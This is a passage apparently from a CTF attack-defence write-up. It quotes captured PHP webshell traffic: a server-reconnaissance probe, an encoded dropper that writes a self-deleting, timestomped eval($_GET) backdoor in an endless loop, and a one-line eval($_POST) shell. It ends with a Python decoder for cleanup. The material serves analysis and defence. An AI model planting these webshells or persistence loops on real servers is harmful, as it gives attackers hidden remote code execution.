    // (the tabs are %09 in the raw request).
    @ini_set("display_errors", "0");
    @set_time_limit(0);
    echo "d32d8";
    $D=dirname($_SERVER["SCRIPT_FILENAME"]);
    if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
    $R="{$D}\t";
    if(substr($D,0,1)!="/"){
        foreach(range("C","Z")as $L)
            if(is_dir("{$L}:"))$R.="{$L}:";
    }else{$R.="/";}
    $R.="\t";
    $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
    $s=($u)?$u["name"]:@get_current_user();
    $R.=php_uname();
    $R.="\t{$s}";
    echo $R;;
    echo "1d77b";
    die();
  • Nu1l's shell 1:
    192.168.21.x

file_put_contents('Nu1ls.php',base64_decode("PD9waHAKCXNldF90aW1lX2xpbWl0KDApOwoJaWdub3JlX3VzZXJfYWJvcnQoMSk7Cgl1bmxpbmsoX19GSUxFX18pOwoJd2hpbGUoMSl7CgkJZmlsZV9wdXRfY29udGVudHMoJy4vLm51MWxjdGZzLnBocCcsICc8P3BocCBAZXZhbCgkX0dFVFsnbnVsbCddKTsnKTsKCQlzeXN0ZW0oJ2NobW9kIDc3NyAuY29uZmlnLnBocCcpOwkJCQkJCgkJLy/mjIHnu63lnKhjb25maWcucGhw5Lit5YaZ5YWlCgkJdG91Y2goIi4vLm51MWxjdGZzLnBocCIsIG1rdGltZSgyMCwxNSwxLDExLDE3LDIwMTcpKTsJCgkJdXNsZWVwKDEwMCk7Cgl9Cj8+Cg=="))


base64-decoded (including the comment line the dropper carries):
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);        // Nu1ls.php removes itself; the loop lives on in the worker process
while(1){
file_put_contents('./.nu1lctfs.php', '<?php @eval($_GET['null']);');   // the shell: eval of the GET parameter "null", no password
system('chmod 777 .config.php');
// keep writing into config.php
touch("./.nu1lctfs.php", mktime(20,15,1,11,17,2017));   // timestomp: mtime set to 2017-11-17 20:15 so the file does not stand out in ls -lt or find -newer
usleep(100);
}
?>

As written, the unescaped single quotes inside '<?php @eval($_GET['null']);' are a PHP parse error, so this variant cannot have run as captured.
  • Nu1l's shell 2:

    file_put_contents%28%22Nu1ls.php%22%2Cbase64_decode%28%22PD9waHAgQGV2YWwoJF9QT1NUWydob21hZWJpYyddKTs%2FPg%3D%3D%22%29%29%3B&zzz=aaa

    // URL-decoded (zzz=aaa is just a second form field in the same request)
    file_put_contents("Nu1ls.php",base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydob21hZWJpYyddKTs/Pg=="));&zzz=aaa

    // base64-decoded: a plain one-line shell, eval of the POST parameter "homaebic"
    file_put_contents("Nu1ls.php",base64_decode("<?php @eval($_POST['homaebic']);?>"));&zzz=aaa
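The decoding done by hand throughout this section, automated, as an added example (not from the original post): URL-decode, find base64 blobs, decode, repeat, then report which paths each layer writes to and which tell-tale constructs (guardian loop, self-delete, timestomp, chmod 500, crontab, eval/system) it contains. NU1L_DROPPER and NU1L_ONELINER are the two Nu1l payloads copied verbatim from the entries above; the regexes and the marker list are choices of this example.

```python
"""Added example, not from the original post: peel URL-encoded / base64-nested
webshell droppers layer by layer and summarise what they write where.
NU1L_DROPPER and NU1L_ONELINER are copied from the log excerpts above; the
regexes and marker list are choices of this example."""
import base64
import binascii
import re
from urllib.parse import unquote_plus

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long enough to skip md5 hex and identifiers
PATH_RES = [
    re.compile(r"""file_put_contents\(\s*(['"])(.+?)\1"""),  # PHP dropper target
    re.compile(r"""\$path\s*=\s*(['"])(.+?)\1"""),           # $path = '...'
    re.compile(r">>?\s*(\S+\.(?:php|conf))"),                # shell redirect target
]
MARKERS = {                                                  # what each layer is doing
    "loop": re.compile(r"while\s*\(\s*(?:1|TRUE|true)\s*\)"),
    "self_delete": re.compile(r"unlink\(__FILE__\)"),
    "timestomp": re.compile(r"\btouch\("),
    "readonly": re.compile(r"chmod 500"),
    "cron": re.compile(r"\bcrontab\b"),
    "eval_or_system": re.compile(r"@?(?:eval|system|assert)\s*\("),
}

NU1L_DROPPER = '''file_put_contents('Nu1ls.php',base64_decode("PD9waHAKCXNldF90aW1lX2xpbWl0KDApOwoJaWdub3JlX3VzZXJfYWJvcnQoMSk7Cgl1bmxpbmsoX19GSUxFX18pOwoJd2hpbGUoMSl7CgkJZmlsZV9wdXRfY29udGVudHMoJy4vLm51MWxjdGZzLnBocCcsICc8P3BocCBAZXZhbCgkX0dFVFsnbnVsbCddKTsnKTsKCQlzeXN0ZW0oJ2NobW9kIDc3NyAuY29uZmlnLnBocCcpOwkJCQkJCgkJLy/mjIHnu63lnKhjb25maWcucGhw5Lit5YaZ5YWlCgkJdG91Y2goIi4vLm51MWxjdGZzLnBocCIsIG1rdGltZSgyMCwxNSwxLDExLDE3LDIwMTcpKTsJCgkJdXNsZWVwKDEwMCk7Cgl9Cj8+Cg=="))'''
NU1L_ONELINER = "file_put_contents%28%22Nu1ls.php%22%2Cbase64_decode%28%22PD9waHAgQGV2YWwoJF9QT1NUWydob21hZWJpYyddKTs%2FPg%3D%3D%22%29%29%3B&zzz=aaa"


def maybe_unquote(s):
    """URL-decode only when the text really is URL-encoded: a raw base64 blob may
    contain '+', which unquote_plus would turn into a space and break it."""
    return unquote_plus(s) if re.search(r"%[0-9A-Fa-f]{2}", s) else s


def try_b64(blob):
    """Decode a candidate only if it is valid base64 that decodes to readable text."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    ok = sum(c.isprintable() or c in "\t\r\n" for c in text)
    return text if text and ok / len(text) > 0.9 else None


def peel(payload, max_depth=6):
    """Successive plaintext layers: [decoded request, first base64 layer, ...]."""
    layers = [maybe_unquote(payload)]
    for _ in range(max_depth):
        found = [t for b in B64_RE.findall(layers[-1]) if (t := try_b64(b))]
        if not found:
            break
        layers.append("\n".join(found))
    return layers


def summarize(payload):
    """Paths written and tell-tale markers across all layers of one payload."""
    layers = peel(payload)
    paths, markers = [], set()
    for text in layers:
        for rx in PATH_RES:
            for m in rx.finditer(text):
                if m.group(m.lastindex) not in paths:
                    paths.append(m.group(m.lastindex))
        markers.update(name for name, rx in MARKERS.items() if rx.search(text))
    return {"layers": len(layers), "paths": paths, "markers": sorted(markers)}


if __name__ == "__main__":
    for p in (NU1L_DROPPER, NU1L_ONELINER):
        print(summarize(p))
        print(peel(p)[-1])
```

The paths list is what you feed the cleanup: every file a layer writes, including the ones the loop maintains rather than the dropper itself (here Nu1ls.php and ./.nu1lctfs.php). The readonly and timestomp markers tell you why a plain rm or an mtime-sorted listing would have missed a file.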

final

There are a few more tricks; I'll share them together with the AWD framework once exams are over and it is written~